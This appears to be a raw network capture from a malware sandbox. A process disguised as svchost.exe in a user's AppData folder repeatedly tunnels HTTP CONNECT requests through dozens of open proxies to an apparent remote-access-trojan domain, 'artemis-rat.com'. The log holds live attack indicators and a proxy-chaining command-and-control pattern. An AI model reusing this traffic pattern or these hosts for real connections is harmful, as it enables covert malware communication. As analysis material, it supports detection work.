Mar 9, 2024 13:14:32.047000885 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:32.382718086 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2843	192.168.2.5	59310	129.213.150.205	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.057998896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2844	192.168.2.5	59225	202.83.102.83	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.057997942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2845	192.168.2.5	59201	202.162.219.10	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.063312054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2846	192.168.2.5	59203	202.150.1.87	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.063502073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2847	192.168.2.5	58506	162.214.165.6	42624	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.070699930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.126291990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.177695036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2848	192.168.2.5	59275	94.23.220.136	35805	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.121129036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.815697908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.787703991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.678015947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2849	192.168.2.5	58478	184.185.2.12	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.121325016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2850	192.168.2.5	58688	162.159.241.160	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.121659994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.282847881 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2851	192.168.2.5	58620	146.190.51.181	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.132778883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.833554983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2852	192.168.2.5	59272	8.222.164.205	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.133570910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2853	192.168.2.5	59269	148.72.206.84	14815	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.148145914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2854	192.168.2.5	59281	130.162.213.175	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.148155928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.460995913 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2855	192.168.2.5	59297	20.111.54.16	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.153006077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.450987101 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2856	192.168.2.5	59398	185.162.230.178	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.162043095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.316379070 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2857	192.168.2.5	59295	218.252.244.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.162775040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2858	192.168.2.5	59406	104.17.9.114	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.179353952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.334846020 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2859	192.168.2.5	59411	173.245.49.27	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.179528952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.335011959 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2860	192.168.2.5	58421	110.93.227.28	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.179529905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.893162012 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2861	192.168.2.5	59285	113.140.74.26	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.180010080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.518033028 CET	922	IN	HTTP/1.1 400 Content-Type: text/html;charset=utf-8 Content-Language: zh-CN Content-Length: 764 Date: Sat, 09 Mar 2024 12:14:31 GMT Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 e7 8a b6 e6 80 81 20 34 30 30 20 2d 20 e9 94 99 e8 af af e7 9a 84 e8 af b7 e6 b1 82 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 e7 8a b6 e6 80 81 20 34 30 30 20 2d 20 e9 94 99 e8 af af e7 9a 84 e8 af b7 e6 b1 82 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e e7 b1 bb e5 9e 8b 3c 2f 62 3e 20 e7 8a b6 e6 80 81 e6 8a a5 e5 91 8a 3c 2f 70 3e 3c 70 3e 3c 62 3e e6 b6 88 e6 81 af 3c 2f 62 3e 20 49 6e 76 61 6c 69 64 20 55 52 49 3c 2f 70 3e 3c 70 3e 3c 62 3e e6 8f 8f e8 bf b0 3c 2f 62 3e 20 e7 94 b1 e4 ba 8e e8 a2 ab e8 ae a4 e4 b8 ba e6 98 af e5 ae a2 e6 88 b7 e7 ab af e5 af b9 e9 94 99 e8 af af ef bc 88 e4 be 8b e5 a6 82 ef bc 9a e7 95 b8 e5 bd a2 e7 9a 84 e8 af b7 e6 b1 82 e8 af ad e6 b3 95 e3 80 81 e6 97 a0 e6 95 88 e7 9a 84 e8 af b7 e6 b1 82 e4 bf a1 e6 81 af e5 b8 a7 e6 88 96 e8 80 85 e8 99 9a e6 8b 9f e7 9a 84 e8 af b7 e6 b1 82 e8 b7 af e7 94 b1 ef bc 89 ef bc 8c e6 9c 8d e5 8a a1 e5 99 a8 e6 97 a0 e6 b3 95 e6 88 96 e4 b8 8d e4 bc 9a e5 a4 84 e7 90 86 e5 bd 93 e5 89 8d e8 af b7 e6 b1 82 e3 80 82 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 37 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="zh"><head><title>HTTP 400 - </title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP 400 - </h1><hr class="line" /><p><b></b> </p><p><b></b> Invalid URI</p><p><b></b> </p><hr class="line" /><h3>Apache Tomcat/8.5.75</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2862	192.168.2.5	59232	116.199.168.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.180479050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2863	192.168.2.5	59307	122.51.123.219	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.180536985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2864	192.168.2.5	59329	140.238.25.255	21000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.180695057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2865	192.168.2.5	59308	91.202.230.219	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.195828915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2866	192.168.2.5	59286	123.30.154.171	7777	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.195843935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.558389902 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.10.3 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2867	192.168.2.5	58516	103.13.120.116	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.195933104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.942605019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2868	192.168.2.5	56529	24.249.199.12	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.206110001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2869	192.168.2.5	59319	74.48.7.43	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.207501888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2870	192.168.2.5	59298	27.65.240.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.209341049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2871	192.168.2.5	59400	209.97.150.167	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.211709976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.224658966 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2872	192.168.2.5	59313	212.108.155.205	9090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.212230921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2873	192.168.2.5	59304	218.65.6.150	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

